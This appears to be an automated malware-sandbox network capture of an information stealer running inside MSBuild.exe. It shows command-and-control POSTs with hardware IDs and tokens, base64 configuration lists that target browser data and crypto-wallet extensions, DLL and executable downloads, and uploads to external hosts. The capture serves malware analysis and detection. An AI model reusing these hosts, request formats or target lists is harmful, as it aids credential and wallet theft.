                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341789007 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341820955 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341831923 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341842890 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341857910 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341877937 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341890097 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341921091 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341929913 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341941118 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341952085 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341953039 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341970921 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.341995001 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342093945 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342103958 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342113972 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342125893 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342137098 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342137098 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342149019 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342160940 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342170954 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.342200041 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353161097 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353180885 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353192091 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353230000 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.353255987 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355452061 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355470896 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355484009 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355496883 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355509043 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355509043 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355549097 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.355573893 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426343918 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426359892 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426374912 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426394939 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426440001 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426451921 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426479101 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426510096 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426510096 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426525116 CEST8056259147.45.44.104192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426553011 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.426575899 CEST5625980192.168.2.8147.45.44.104
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581537008 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581581116 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581758022 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581969023 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:17.581983089 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.232314110 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.232362986 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.232433081 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.245146036 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.245167971 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.459486008 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.459716082 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.564888000 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.564898968 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.818238020 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:18.818258047 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.096350908 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.096442938 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.100183964 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.100198984 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.100481987 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.143651962 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.191405058 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716028929 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716054916 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716123104 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716145992 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716166973 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716170073 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716190100 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716202021 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716209888 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.716231108 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.826562881 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.826683998 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.826750040 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.826750040 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.827131987 CEST56262443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.827159882 CEST4435626249.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828423023 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828465939 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828547001 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828816891 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.828826904 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897417068 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897445917 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897480011 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897562981 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897594929 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897610903 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897614002 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.897660971 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.898922920 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.898943901 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.898952961 CEST56263443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.898958921 CEST44356263104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.918508053 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.918555021 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.918646097 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.918987989 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:19.919003963 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.689928055 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.690113068 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.691683054 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.691700935 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.692408085 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.693716049 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.693742037 CEST56266443192.168.2.8172.67.166.76
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.693840027 CEST44356266172.67.166.76192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.848171949 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.848335028 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.848951101 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.848968983 CEST4435626549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:15:20.850861073 CEST56265443192.168.2.849.12.197.9
                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                    • 49.12.197.9
                                                                                                                                                                                                                    • advocachark.store
                                                                                                                                                                                                                    • playd.healthnlife.pk
                                                                                                                                                                                                                    • cowod.hopto.org
Session ID: 0
Source IP: 192.168.2.8
Source Port: 56259
Destination IP: 147.45.44.104
Destination Port: 80
PID: 3832
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp: Oct 3, 2024 15:15:10.507978916 CEST
Bytes transferred: 190
Direction: OUT
Data:
GET /ldms/a43486128347.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: playd.healthnlife.pk
Cache-Control: no-cache

Timestamp: Oct 3, 2024 15:15:15.774779081 CEST
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:15:14 GMT
Content-Type: application/octet-stream
Content-Length: 540536
Last-Modified: Thu, 03 Oct 2024 12:52:19 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66fe9383-83f78"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 56268 | 45.132.206.251 | 80 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 15:15:21.844088078 CEST | 281 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: cowod.hopto.org
    Content-Length: 3177
    Connection: Keep-Alive
    Cache-Control: no-cache
Oct 3, 2024 15:15:21.844124079 CEST | 3177 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31
    Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FIDHIEBAAKJDHI
Oct 3, 2024 15:15:22.702121973 CEST | 188 | IN | HTTP/1.1 200 OK
    Server: openresty
    Date: Thu, 03 Oct 2024 13:15:22 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Connection: keep-alive
    X-Served-By: cowod.hopto.org


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49712 | 104.102.49.254 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:34 UTC | 119 | OUT | GET /profiles/76561199780418869 HTTP/1.1
    Host: steamcommunity.com
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 13:14:35 UTC | 1870 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Thu, 03 Oct 2024 13:14:35 GMT
    Content-Length: 34879
    Connection: close
    Set-Cookie: sessionid=ea29ec50f37bf0edf0dc1695; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49713 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:36 UTC | 184 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 13:14:36 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 03 Oct 2024 13:14:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-10-03 13:14:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49714 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:37 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:37 UTC | 256 | OUT | Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="hwid"B9EB45721C951117388365-a33c7340-61ca------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FIDHIEBAAKJDHIECAAFH--
2024-10-03 13:14:38 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:14:38 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3a1|1|1|1|b53e813d9350fb5d52ee778b674f49f5|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49715 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:39 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:39 UTC | 331 | OUT | Data Ascii: ------IJKFIIIJJKJJKEBGIDGCContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------IJKFIIIJJKJJKEBGIDGCContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IJKFIIIJJKJJKEBGIDGCCont
2024-10-03 13:14:39 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:14:39 UTC | 1564 | IN | Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 56237 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:40 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:40 UTC | 331 | OUT | Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IDAKJKEHDBGHIDHIEHDBCont
2024-10-03 13:14:41 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:14:41 UTC | 5685 | IN | Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 56238 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:41 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:41 UTC | 332 | OUT | Data Ascii: ------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------AAAEBAFBGIDHCBFHIECFCont
2024-10-03 13:14:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:14:42 UTC | 119 | IN | Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 56239 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:43 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 5957
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:43 UTC | 5957 | OUT | Data Ascii: ------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------HCFCFHJDBKJKEBFHJEHICont
2024-10-03 13:14:43 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:14:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 56240 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:44 UTC | 192 | OUT | GET /sqlp.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:44 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:44 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: close
Last-Modified: Thursday, 03-Oct-2024 13:14:44 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 56241 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:47 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:47 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74
